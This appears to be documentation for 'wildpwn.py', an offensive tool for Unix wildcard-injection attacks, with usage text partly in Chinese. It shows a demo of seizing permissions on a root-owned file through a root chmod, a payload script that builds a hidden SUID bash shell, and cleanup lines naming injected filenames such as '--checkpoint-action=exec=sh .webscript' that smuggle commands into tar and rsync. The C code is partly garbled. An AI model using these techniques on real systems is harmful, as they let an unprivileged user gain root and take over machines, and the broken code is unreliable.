
usage: wildpwn.py [-h] [--file FILE] payload folder
Tool to generate unix wildcard attacks
positional arguments:
  payload      要使用的payload: (combined | tar | rsync)
  folder       要写入payloads的位置
optional arguments:
  -h, --help   显示帮助信息并退出
  --file FILE  获取所有/更改权限的文件路径。该参数只支持combined攻击
Payload 类型
combined: 使用chown & chmod 文件相关技巧,具体请参阅文档的4.1 和 4.2部分。
tar: 使用Tar任意命令执行技巧,具体请参阅文档的4.3部分。
rsync: 使用Rsync任意命令执行技巧,具体请参阅文档的4.4部分。
$ ls -lh /tmp/very_secret_file
-rw-r--r-- 1 root root 2048 jun 28 21:37 /tmp/very_secret_file
$ ls -lh ./pwn_me/
drwxrwxrwx 2 root root 4,0K jun 28 21:38 .
-rw-rw-r-- 1 root root    1024 jun 28 21:38 secret_file_1
-rw-rw-r-- 1 root root    1024 jun 28 21:38 secret_file_2
$ python wildpwn.py --file /tmp/very_secret_file combined ./pwn_me/
[!] Selected payload: combined
[+] Done! Now wait for something like: chown uid:gid *  (or)  chmod [perms] * on ./pwn_me/. Good luck!
[...time passes / some cron gets executed...]
# chmod 000 * (for example)
[...back with the unprivileged user...]
$ ls -lha ./pwn_me/
-rwxrwxrwx 1 root root    1024 jun 28 21:38 secret_file_1
-rwxrwxrwx 1 root root    1024 jun 28 21:38 secret_file_2
$ ls -lha /tmp/very_secret_file
-rwxrwxrwx 1 root root 2048 jun 28 21:38 /tmp/very_secret_file
# get current user uid / gid
CURR_UID="$(id -u)"
CURR_GID="$(id -g)"
# save file
cat > .cachefile.c #include
int main()
execl("/bin/bash", "-bash", NULL);
return 0;
# make folder where the payload will be saved
mkdir .cache
chmod 755 .cache
# compile & give SUID
gcc -w .cachefile.c -o .cache/.cachefile
chmod 4755 .cache/.cachefile
Clean up (tar)
# clean up
rm -rf ./'--checkpoint=1'
rm -rf ./'--checkpoint-action=exec=sh .webscript'
rm -rf .webscript
rm -rf .cachefile.c
Clean up (rsync)
# clean up
rm -rf ./'-e sh .syncscript'
rm -rf .syncscript
rm -rf .cachefile.c